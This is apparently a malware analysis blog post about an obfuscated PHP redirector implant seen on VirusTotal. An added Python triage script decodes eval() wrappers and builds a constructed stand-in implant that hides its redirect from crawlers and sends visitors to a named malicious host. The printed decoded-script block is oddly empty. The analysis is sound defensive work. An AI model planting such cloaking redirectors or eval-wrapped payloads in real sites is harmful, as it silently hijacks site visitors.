
Analysis: PHP.dbc1bf2de89ee7dd2597697b315be084ccf86edefd9f7e2dbf430438871a3fee

An analysis of a PHP implant I came across on VirusTotal Intelligence.

On an initial look at the file it is obvious that something funky is going on: spot the eval() right at the beginning of the code, the classic sign of a wrapped payload...

The decoded eval looks like this:

<?php 
}

A quick glance over the decoded script shows it is a 'redirector': its purpose is to send visitors to an alternative location, in this case via header("Location: http://ibontu.25u.com/");

The script also screens out requests from bots, so that bots are never redirected and only ordinary visitors end up at the alternative site.

Crude, but effective - somewhat :/
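The post does not reproduce the decoded script, so as an added example (not the sample's code and not part of the original write-up) here is a small Python triage script for redirectors of this kind. It builds a constructed stand-in for the implant, peels the eval() wrapper by applying the inverse of each PHP decoding function it finds (base64_decode, gzinflate, gzuncompress, str_rot13, strrev are assumptions covering the common wrappers; the real sample's wrapper is not shown on the page), and then pulls out the redirect target and any user-agent based bot filtering. The inner script, its bot list and the gzinflate(base64_decode()) wrapping are constructed for illustration.

```python
import base64
import codecs
import re
import zlib

# Constructed stand-in for the inner redirector: a user-agent based bot
# check followed by a Location header. The crawler list and wrapping
# functions are assumptions for illustration, not the real sample's code.
INNER_PHP = r'''<?php
$ua = strtolower($_SERVER['HTTP_USER_AGENT']);
$crawlers = array('googlebot', 'bingbot', 'yandex', 'slurp');
foreach ($crawlers as $c) {
    if (strpos($ua, $c) !== false) { exit(); }   # bots are never redirected
}
header("Location: http://ibontu.25u.com/");
exit();
'''


def php_gzdeflate(data: bytes) -> bytes:
    """Raw DEFLATE stream (no zlib header), i.e. what PHP's gzinflate() expects."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()


def build_sample() -> str:
    """Wrap the inner script the way many PHP implants are shipped (assumed form)."""
    payload = base64.b64encode(php_gzdeflate(INNER_PHP.encode())).decode()
    return '<?php eval(gzinflate(base64_decode("%s")));' % payload


# Matches eval(f1(f2("literal"))) with any nesting of plain function calls.
WRAP_RE = re.compile(r'eval\s*\(\s*((?:\w+\s*\(\s*)+)[\'"]([^\'"]*)[\'"]\s*\)+\s*;?', re.S)

# Python equivalents of the PHP decoders commonly stacked inside eval().
DECODERS = {
    'base64_decode': base64.b64decode,
    'gzinflate': lambda b: zlib.decompress(b, -15),
    'gzuncompress': zlib.decompress,
    'str_rot13': lambda b: codecs.encode(b.decode('latin-1'), 'rot13').encode('latin-1'),
    'strrev': lambda b: b[::-1],
}


def peel_eval(source: str, max_layers: int = 10):
    """Strip eval(...) wrappers layer by layer; returns (decoded source, layers applied)."""
    layers = []
    for _ in range(max_layers):
        m = WRAP_RE.search(source)
        if not m:
            break
        funcs = re.findall(r'\w+', m.group(1))      # outermost first
        data = m.group(2).encode('latin-1')
        for fn in reversed(funcs):                    # innermost decoder runs first
            if fn not in DECODERS:
                raise ValueError('unsupported wrapper function: ' + fn)
            data = DECODERS[fn](data)
        layers.append(funcs)
        source = data.decode('latin-1', errors='replace')
    return source, layers


def triage(source: str) -> dict:
    """Decode the implant and summarise what a redirector of this kind does."""
    decoded, layers = peel_eval(source)
    loc = re.search(r'header\s*\(\s*[\'"]Location:\s*([^\'"]+)[\'"]', decoded, re.I)
    # Quoted literals that look like crawler names; the character class keeps the
    # match inside a single string literal so code between literals is not picked up.
    bot_terms = sorted(set(re.findall(
        r'[\'"]([\w.\- ]*(?:bot|crawl|spider|slurp|yandex)[\w.\- ]*)[\'"]', decoded, re.I)))
    return {
        'layers': layers,
        'redirect_to': loc.group(1) if loc else None,
        'checks_user_agent': 'HTTP_USER_AGENT' in decoded,
        'bot_terms': bot_terms,
        'decoded': decoded,
    }


if __name__ == '__main__':
    report = triage(build_sample())
    for key in ('layers', 'redirect_to', 'checks_user_agent', 'bot_terms'):
        print(key, '=', report[key])
```

Running the script on the constructed sample reports one gzinflate(base64_decode()) layer, the redirect target http://ibontu.25u.com/, a user-agent check, and the four crawler names; on a real sample, feed the file contents to triage() and add any further wrapper function it raises on to DECODERS.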

References

VirusTotal

Obfuscated - https://www.virustotal.com/en/file/dbc1bf2de89ee7dd2597697b315be084ccf86edefd9f7e2dbf430438871a3fee/analysis/
DeObfuscated - https://www.virustotal.com/en/file/66899269383bd479b0e29a5136e496bbd8d068daf514909bf7b2f30174dac0b9/analysis